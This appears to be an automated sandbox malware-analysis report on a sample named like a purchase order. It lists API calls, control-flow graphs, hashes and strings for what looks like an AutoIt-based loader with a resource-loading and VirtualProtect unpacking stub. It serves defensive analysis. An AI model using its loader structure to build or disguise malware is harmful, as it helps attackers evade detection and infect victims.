                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00014FF9
                                                • FindResourceExW.KERNEL32(00000000,0000000A,SCRIPT,00000000,?,?,?,?,?,00014EEE,?,?,00000000), ref: 00015010
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,00014EEE,?,?,00000000), ref: 0004DC90
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,00014EEE,?,?,00000000), ref: 0004DCA5
                                                • LockResource.KERNEL32(00014EEE,?,?,?,?,?,00014EEE,?,?,00000000), ref: 0004DCB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: 00c9a33ccbf2638a9a7bb633b01167b34ad84717270bbd92656f81e249cf6526
                                                • Instruction ID: 3bf6f0e41a7fc81239e47e157a59030e6c0ff2449cbd62fb4c20b79a1830947a
                                                • Opcode Fuzzy Hash: 00c9a33ccbf2638a9a7bb633b01167b34ad84717270bbd92656f81e249cf6526
                                                • Instruction Fuzzy Hash: 06115A75200702AFE7218B65DC48F677BBAFBC9B52F204169F406CA260DBA1E8408660
                                                Function 0019AAC0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 303 19aac0-19aacd 304 19aada-19aadf 303->304 305 19aae1 304->305 306 19aad0-19aad5 305->306 307 19aae3 305->307 308 19aad6-19aad8 306->308 309 19aae8-19aaea 307->309 308->304 308->305 310 19aaec-19aaf1 309->310 311 19aaf3-19aaf7 309->311 310->311 312 19aaf9 311->312 313 19ab04-19ab07 311->313 314 19aafb-19ab02 312->314 315 19ab23-19ab28 312->315 316 19ab09-19ab0e 313->316 317 19ab10-19ab12 313->317 314->313 314->315 318 19ab3b-19ab3d 315->318 319 19ab2a-19ab33 315->319 316->317 317->309 322 19ab3f-19ab44 318->322 323 19ab46 318->323 320 19abaa-19abad 319->320 321 19ab35-19ab39 319->321 324 19abb2-19abb5 320->324 321->323 322->323 325 19ab48-19ab4b 323->325 326 19ab14-19ab16 323->326 327 19abb7-19abb9 324->327 328 19ab4d-19ab52 325->328 329 19ab54 325->329 330 19ab18-19ab1d 326->330 331 19ab1f-19ab21 326->331 327->324 333 19abbb-19abbe 327->333 328->329 329->326 334 19ab56-19ab58 329->334 330->331 332 19ab75-19ab84 331->332 335 19ab94-19aba1 332->335 336 19ab86-19ab8d 332->336 333->324 337 19abc0-19abdc 333->337 338 19ab5a-19ab5f 334->338 339 19ab61-19ab65 334->339 335->335 341 19aba3-19aba5 335->341 336->336 340 19ab8f 336->340 337->327 342 19abde 337->342 338->339 339->334 343 19ab67 339->343 340->308 341->308 344 19abe4-19abe8 342->344 345 19ab69-19ab70 343->345 346 19ab72 343->346 347 19abea-19ac00 LoadLibraryA 344->347 348 19ac2f-19ac32 344->348 345->334 345->346 346->332 350 19ac01-19ac06 347->350 349 19ac35-19ac3c 348->349 351 19ac3e-19ac40 349->351 352 19ac60-19ac90 VirtualProtect * 2 349->352 350->344 353 19ac08-19ac0a 350->353 354 19ac53-19ac5e 351->354 355 19ac42-19ac51 351->355 356 19ac94-19ac98 352->356 357 19ac0c-19ac12 353->357 358 19ac13-19ac20 GetProcAddress 353->358 354->355 355->349 356->356 361 19ac9a 356->361 357->358 359 19ac29 ExitProcess 358->359 360 19ac22-19ac27 358->360 360->350
                                                APIs
                                                • LoadLibraryA.KERNEL32(?), ref: 0019ABFA
                                                • GetProcAddress.KERNEL32(?,00193FF9), ref: 0019AC18
                                                • ExitProcess.KERNEL32(?,00193FF9), ref: 0019AC29
                                                • VirtualProtect.KERNELBASE(00010000,00001000,00000004,?,00000000), ref: 0019AC77
                                                • VirtualProtect.KERNELBASE(00010000,00001000), ref: 0019AC8C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                • String ID:
                                                • API String ID: 1996367037-0
                                                • Opcode ID: 55d2f4e630b2a0dabe0a8b6f3919340dba32371807218a8ecbe655fc68f1cc2f
                                                • Instruction ID: da9e6826455c363bc67de88aeb964f8753a1bd40a66cc6ea99d5446ed93a4555
                                                • Opcode Fuzzy Hash: 55d2f4e630b2a0dabe0a8b6f3919340dba32371807218a8ecbe655fc68f1cc2f
                                                • Instruction Fuzzy Hash: 38511472A542124BDF258EB8DCD0660B795EF113247A90738C6E2CB3C5E7A4680DC3E2
                                                Function 00013688 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58nativewindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 671 13688-1368f 672 13695-1369a 671->672 673 1375d-13765 PostQuitMessage 671->673 674 136a0-136a2 672->674 675 4d2bf-4d2c7 672->675 676 13711-13713 673->676 677 13767-13770 674->677 678 136a8-136ad 674->678 679 4d2cc call 7281f 675->679 680 136d8-136de 676->680 684 13771 call 14531 677->684 681 4d2a4-4d2ab 678->681 682 136b3-136b8 678->682 683 4d2d1-4d2d3 679->683 689 4d2b1-4d2ba call 67f5e 681->689 690 136ca-136d2 NtdllDefWindowProc_W 681->690 685 1374b-13751 682->685 686 136be-136c4 682->686 683->676 687 4d2d9 683->687 688 13776 684->688 692 13756 call 145df 685->692 686->690 687->687 688->676 689->690 690->680 694 1375b 692->694 694->676
                                                APIs
                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 000136D2
                                                • PostQuitMessage.USER32(00000000), ref: 0001375F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: MessageNtdllPostProc_QuitWindow
                                                • String ID: ;=$d
                                                • API String ID: 4264772764-1391878868
                                                • Opcode ID: 1856282f9495b1d806154c0c0b2d016da4ff80be3c8b42d017bfd0e58ad639ab
                                                • Instruction ID: df3634065a15d72fd00cf07b1cc0a01b2a78a8a17e77d029e7b02ecbbf5d1005
                                                • Opcode Fuzzy Hash: 1856282f9495b1d806154c0c0b2d016da4ff80be3c8b42d017bfd0e58ad639ab
                                                • Instruction Fuzzy Hash: A40149F210854ABBEB745F68ED0DAFE3B55FB14301F14403BFA05901A2CE69CAA16732
                                                Function 0007449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,0004E6F1), ref: 000744AB
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 000744BC
                                                • FindClose.KERNEL32(00000000), ref: 000744CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: f062f430c51899d4290935f5b344cba8f19b27edbf1e5d63ef59bab9e1e33d18
                                                • Instruction ID: 5a1407149648a329e9789b29cc76420e57a7be1e6ccf8f9a829b6087e1f60b28
                                                • Opcode Fuzzy Hash: f062f430c51899d4290935f5b344cba8f19b27edbf1e5d63ef59bab9e1e33d18
                                                • Instruction Fuzzy Hash: 25E0D831C10801675210A738EC4D5F9779CBF05335F108716F939C10D0EB7C59109599
                                                Function 000136E5 Relevance: 1.5, APIs: 1, Instructions: 12nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 000136D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: NtdllProc_Window
                                                • String ID:
                                                • API String ID: 4255912815-0
                                                • Opcode ID: 42c82d6c6caea6e003622d23f551cf240159796b25ca4611f8393300b2d25157
                                                • Instruction ID: 99a790eb1d56899517f8f7837308ee8438b84f6c81cb24fd4e2532088009d763
                                                • Opcode Fuzzy Hash: 42c82d6c6caea6e003622d23f551cf240159796b25ca4611f8393300b2d25157
                                                • Instruction Fuzzy Hash: 26C04C33205159A79B219E85BC04DEFBB25FB89322B10456BFA45C016147264531A7B2
                                                Function 000171EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00014864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000172BA,?,?,?,?,0001108C,-000D4E84), ref: 00014882
                                                  • Part of subcall function 0003068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000172C5,?,?,?,?,0001108C,-000D4E84), ref: 000306AD
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\,?,?,?,?,0001108C,-000D4E84), ref: 00017308
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,?,?,?,0001108C,-000D4E84), ref: 0004EC21
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,?,?,0001108C,-000D4E84), ref: 0004EC62
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,0001108C,-000D4E84), ref: 0004ECA0
                                                • _wcscat.LIBCMT ref: 0004ECF9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 2673923337-2727554177
                                                • Opcode ID: f1fae4ca735721230f6eb883dc7a6f269862f0ff9a5cfec9b9b6e81541a39bd2
                                                • Instruction ID: 6bf09debcecb380ee6077dc6a4f7348bb36ff5c97ea5736b7df9869d05f7170f
                                                • Opcode Fuzzy Hash: f1fae4ca735721230f6eb883dc7a6f269862f0ff9a5cfec9b9b6e81541a39bd2
                                                • Instruction Fuzzy Hash: 2A716C7150A3019ED714DF65DC818EBBBF8FF88340F40492EF845871A2DB769949CBA6
                                                Function 00013A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00013A62
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00013A71
                                                • LoadIconW.USER32(00000063), ref: 00013A88
                                                • LoadIconW.USER32(000000A4), ref: 00013A9A
                                                • LoadIconW.USER32(000000A2), ref: 00013AAC
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00013AD2
                                                • RegisterClassExW.USER32(?), ref: 00013B28
                                                  • Part of subcall function 00013041: GetSysColorBrush.USER32(0000000F), ref: 00013074
                                                  • Part of subcall function 00013041: RegisterClassExW.USER32(00000030), ref: 0001309E
                                                  • Part of subcall function 00013041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 000130AF
                                                  • Part of subcall function 00013041: LoadIconW.USER32(000000A9), ref: 000130F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 2880975755-4155596026
                                                • Opcode ID: 3bb3f8c39edf680892ea69bbe66327a181628c762d274d7ab17a22db73acaaa0
                                                • Instruction ID: 67d7ea734f446b8b36ccb5a38f8f890cd26236f87c5550208c35d1bcf328fee8
                                                • Opcode Fuzzy Hash: 3bb3f8c39edf680892ea69bbe66327a181628c762d274d7ab17a22db73acaaa0
                                                • Instruction Fuzzy Hash: 41213971902305AFFB10DFA4EC09BBD7BB4FB09712F10012BED04A62A1D3B946589FA4
                                                Function 000407B7 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 194COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 77 407b7-407ba 78 407bc-407bf 77->78 79 407df-407e4 77->79 81 407c1-407cc call 38ca8 call 38f36 78->81 82 407d8-407eb 78->82 80 407ee-407fa 79->80 84 409c7-409d9 80->84 85 40800 80->85 94 407d1-407d3 81->94 82->80 84->81 95 409df-409ef call 48721 84->95 89 40807-40809 85->89 92 40916-4091b 89->92 93 4080f-40815 89->93 92->84 98 40921-40924 92->98 96 408a5-408a8 93->96 97 4081b 93->97 99 40a1e-40a24 94->99 108 409f4-409f9 95->108 103 408fa-408ff 96->103 104 408aa-408ad 96->104 101 40893-40897 97->101 102 4081d-40820 97->102 105 40929-4092c 98->105 110 40901-40903 101->110 111 40899-408a3 101->111 112 40826-40829 102->112 113 40907-40910 102->113 109 40905 103->109 103->110 114 408af-408b0 104->114 115 408ea-408f0 104->115 106 40926 105->106 107 4092e-40940 call 337e2 105->107 106->105 107->81 131 40946-4094c 107->131 108->94 118 409ff-40a1b 108->118 109->113 110->113 111->113 119 4087d-40880 112->119 120 4082b-4082c 112->120 113->89 113->92 121 408b2-408b5 114->121 122 408dd-408df 114->122 115->110 117 408f2-408f8 115->117 117->113 118->99 119->110 125 40882-40891 119->125 126 40871-40878 120->126 127 4082e-40831 120->127 128 408b7-408ba 121->128 129 408d0-408d2 121->129 122->110 124 408e1-408e8 122->124 124->113 125->113 126->110 133 40860-40863 127->133 134 40833-40836 127->134 128->81 130 408c0-408c6 128->130 129->110 132 408d4-408db 129->132 130->110 137 408c8-408ce 130->137 138 40951-40954 131->138 132->113 133->110 139 40869-4086c 133->139 135 40855-4085b 134->135 136 40838-4083b 134->136 135->113 136->81 140 4083d-40840 136->140 137->113 141 40956-4095a 138->141 142 4094e 138->142 139->113 140->110 143 40846-40850 140->143 141->81 144 40960-40966 141->144 142->138 143->113 144->144 145 40968-4097a call 3394b 144->145 148 40987-40999 call 3394b 145->148 149 4097c-40985 145->149 152 409a6-409b8 call 3394b 148->152 153 4099b-409a4 148->153 149->84 152->81 156 409be-409c1 152->156 153->84 156->84
                                                APIs
                                                • __wcsnicmp.LIBCMT ref: 00040970
                                                • __wcsnicmp.LIBCMT ref: 0004098F
                                                  • Part of subcall function 00038CA8: __getptd_noexit.LIBCMT ref: 00038CA8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: __wcsnicmp$__getptd_noexit
                                                • String ID: P-}$UNICODE$UTF-16LE$UTF-8$ccs
                                                • API String ID: 78897640-3509635038
                                                • Opcode ID: 80d8e39787b7d54f5f67d479a36c6265007c676952fa82a1ee0f8ba8489905fb
                                                • Instruction ID: 48c3025fa9ec4ac7f799bd75edaccdd1109ca4f1faedc658ab63a835fed44bbf
                                                • Opcode Fuzzy Hash: 80d8e39787b7d54f5f67d479a36c6265007c676952fa82a1ee0f8ba8489905fb
                                                • Instruction Fuzzy Hash: 635158F2E08309D9FFB40E65D945B7966D0AB51364F24403AEF85B71C3E6B5CE80864E
                                                Function 00013017 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 74registrywindowclipboardCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00013074
                                                • RegisterClassExW.USER32(00000030), ref: 0001309E
                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 000130AF
                                                • LoadIconW.USER32(000000A9), ref: 000130F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 975902462-1005189915
                                                • Opcode ID: 0062c7d9c431c43e0186cc333d68a8f8c5d2fd4035c75bdd515289069fe4ff3c
                                                • Instruction ID: 17c9416896fceddc0b9e7b9429cb39599f3585d2044016e3c6708372e00aafd1
                                                • Opcode Fuzzy Hash: 0062c7d9c431c43e0186cc333d68a8f8c5d2fd4035c75bdd515289069fe4ff3c
                                                • Instruction Fuzzy Hash: 12314CB1941306AFEB40CFA4DC85AEDBBF4FB09311F14412BE980E62A0D7B90585DF91
                                                Function 00013041 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 54registrywindowclipboardCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00013074
                                                • RegisterClassExW.USER32(00000030), ref: 0001309E
                                                • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 000130AF
                                                • LoadIconW.USER32(000000A9), ref: 000130F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 975902462-1005189915
                                                • Opcode ID: 383c6cd5b2420a1ba7e41d274dc8d5f497f8e3c06f217258c7571cb9f4fda009
                                                • Instruction ID: b2520fed28ceeb6e027ef532d99c4bbda9d0d3ddc315c4abbaa58d08ca27218f
                                                • Opcode Fuzzy Hash: 383c6cd5b2420a1ba7e41d274dc8d5f497f8e3c06f217258c7571cb9f4fda009
                                                • Instruction Fuzzy Hash: 7921C5B1901619AFEB00DFA4EC49BEDBBF8FB09701F10412BF910E62A0D7B945549FA1
                                                Function 0001F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00030313
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0003031B
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00030326
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00030331
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00030339
                                                  • Part of subcall function 000302E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00030341
                                                  • Part of subcall function 00026259: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 000262B4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0001FB2D
                                                • OleInitialize.OLE32(00000000), ref: 0001FBAA
                                                • CloseHandle.KERNEL32(00000000), ref: 00054921
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2043823400.0000000000011000.00000040.00000001.01000000.00000003.sdmp, Offset: 00010000, based on PE: true
                                                • Associated: 00000000.00000002.2043798487.0000000000010000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.00000000000DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2043823400.0000000000194000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044008442.000000000019A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2044024017.000000000019B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000_PO-78140924.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
                                                • String ID: <W$\T$%$S
                                                • API String ID: 3094916012-882076323
                                                • Opcode ID: 81254fc62d386fa0b759ff792fe7d9e48c414860662a6d42d5e4963616b747af
                                                • Instruction ID: 93465659034a5f722b32a7a3d527124d8491a1926c93e6ec4d572a61ebbfae90
                                                • Opcode Fuzzy Hash: 81254fc62d386fa0b759ff792fe7d9e48c414860662a6d42d5e4963616b747af
                                                • Instruction Fuzzy Hash: 0181BDB0906F418FE384DF29FD556997BE5FB4830B760812B9C19C72A2EB7845848F72
                                                Function 0004822B Relevance: 10.6, APIs: 7, Instructions: 62fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
